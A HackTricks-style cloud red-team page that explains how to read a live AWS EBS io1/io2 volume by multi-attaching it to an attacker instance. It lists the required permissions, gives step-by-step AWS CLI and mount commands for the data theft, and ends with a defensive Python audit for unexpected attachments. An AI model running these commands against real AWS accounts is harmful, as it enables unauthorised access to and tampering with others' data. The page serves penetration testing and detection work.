AWS - Live Data Theft via EBS Multi-Attach
Learn and practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking:
HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Summary
Abuse EBS Multi-Attach to read from a live io1/io2 data volume by attaching the same volume to an attacker-controlled instance in the same Availability Zone (AZ). Mounting the shared volume read-only gives immediate access to in-use files without creating snapshots.
Requirements
- Target volume: io1 or io2 created with --multi-attach-enabled in the same AZ as the attacker instance.
- Permissions: ec2:AttachVolume, ec2:DescribeVolumes, ec2:DescribeInstances on the target volume/instances.
- Infrastructure: Nitro-based instance types that support Multi-Attach (C5/M5/R5 families, etc.).
Notes
- Mount read-only with -o ro,noload to reduce the risk of corruption and avoid journal replays.
- On Nitro instances the EBS NVMe device exposes a stable /dev/disk/by-id/nvme-Amazon_Elastic_Block_Store_vol... path (helper below).
Prepare a Multi-Attach io2 volume and attach it to the victim
Example (create in us-east-1a and attach to the victim):
AZ=us-east-1a
# Create io2 volume with Multi-Attach enabled
VOL_ID=$(aws ec2 create-volume \
--size 10 \
--volume-type io2 \
--iops 1000 \
--availability-zone $AZ \
--multi-attach-enabled \
--tag-specifications 'ResourceType=volume,Tags=[{Key=Name,Value=multi-shared}]' \
--query 'VolumeId' --output text)
# Attach to victim instance
aws ec2 attach-volume --volume-id $VOL_ID --instance-id $VICTIM_INSTANCE --device /dev/sdf
On the victim, format and mount the new volume, then write sensitive data (for example):
VOLNOHYP="vol${VOL_ID#vol-}"
DEV="/dev/disk/by-id/nvme-Amazon_Elastic_Block_Store_${VOLNOHYP}"
sudo mkfs.ext4 -F "$DEV"
sudo mkdir -p /mnt/shared
sudo mount "$DEV" /mnt/shared
echo 'secret-token-ABC123' | sudo tee /mnt/shared/secret.txt
sudo sync
Attach the same volume to the attacker instance
aws ec2 attach-volume --volume-id $VOL_ID --instance-id $ATTACKER_INSTANCE --device /dev/sdf
Mount read-only on the attacker and read the data
VOLNOHYP="vol${VOL_ID#vol-}"
DEV="/dev/disk/by-id/nvme-Amazon_Elastic_Block_Store_${VOLNOHYP}"
sudo mkdir -p /mnt/steal
sudo mount -o ro,noload "$DEV" /mnt/steal
sudo cat /mnt/steal/secret.txt
Expected result: the same VOL_ID shows multiple Attachments (victim and attacker), and the attacker can read files written by the victim without creating any snapshot.
aws ec2 describe-volumes --volume-ids $VOL_ID \
--query 'Volumes[0].Attachments[*].{InstanceId:InstanceId,State:State,Device:Device}'
Helper: find the NVMe device path by Volume ID
On Nitro instances, use the stable by-id path that embeds the volume id (remove the dash after vol):
VOLNOHYP="vol${VOL_ID#vol-}"
ls -l /dev/disk/by-id/ | grep "$VOLNOHYP"
# -> nvme-Amazon_Elastic_Block_Store_volXXXXXXXX...
Impact
- Immediate read access to live data on the target EBS volume without creating snapshots.
- If mounted read-write, the attacker can tamper with the victim's filesystem (risk of corruption).
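A defender-side check for the multiple-Attachments condition described above, as an added example that is not part of the original page: it audits output shaped like `aws ec2 describe-volumes --output json` for Multi-Attach volumes attached to instances outside an expected set. The sample data, the volume and instance IDs, and the EXPECTED allowlist are constructed assumptions.

```python
import json

# Constructed sample shaped like `aws ec2 describe-volumes --output json`;
# volume and instance IDs are made up for this example.
SAMPLE = json.loads("""
{"Volumes": [
  {"VolumeId": "vol-0aaa1111", "VolumeType": "io2", "MultiAttachEnabled": true,
   "AvailabilityZone": "us-east-1a",
   "Attachments": [
     {"InstanceId": "i-0victim01", "State": "attached", "Device": "/dev/sdf"},
     {"InstanceId": "i-0unknown9", "State": "attached", "Device": "/dev/sdf"}]},
  {"VolumeId": "vol-0bbb2222", "VolumeType": "io2", "MultiAttachEnabled": true,
   "AvailabilityZone": "us-east-1a",
   "Attachments": [
     {"InstanceId": "i-0victim01", "State": "attached", "Device": "/dev/sdg"}]},
  {"VolumeId": "vol-0ccc3333", "VolumeType": "gp3", "MultiAttachEnabled": false,
   "AvailabilityZone": "us-east-1a",
   "Attachments": [
     {"InstanceId": "i-0victim01", "State": "attached", "Device": "/dev/sda1"}]}
]}
""")

# Hypothetical allowlist: instances that are expected to share each volume.
EXPECTED = {"vol-0aaa1111": {"i-0victim01"}, "vol-0bbb2222": {"i-0victim01"}}


def audit_multi_attach(doc, expected):
    """Return (volume_id, finding, instance_ids) for each Multi-Attach volume worth review."""
    findings = []
    for vol in doc.get("Volumes", []):
        if not vol.get("MultiAttachEnabled"):
            continue  # single-attach volumes cannot be shared this way
        live = {a["InstanceId"] for a in vol.get("Attachments", [])
                if a.get("State") in ("attaching", "attached")}
        unexpected = sorted(live - expected.get(vol["VolumeId"], set()))
        if unexpected:
            findings.append((vol["VolumeId"], "unexpected-attachment", unexpected))
        elif len(live) <= 1:
            # Multi-Attach is enabled but at most one instance uses it: review the flag.
            findings.append((vol["VolumeId"], "multi-attach-unused", sorted(live)))
    return findings


if __name__ == "__main__":
    for finding in audit_multi_attach(SAMPLE, EXPECTED):
        print(finding)
```
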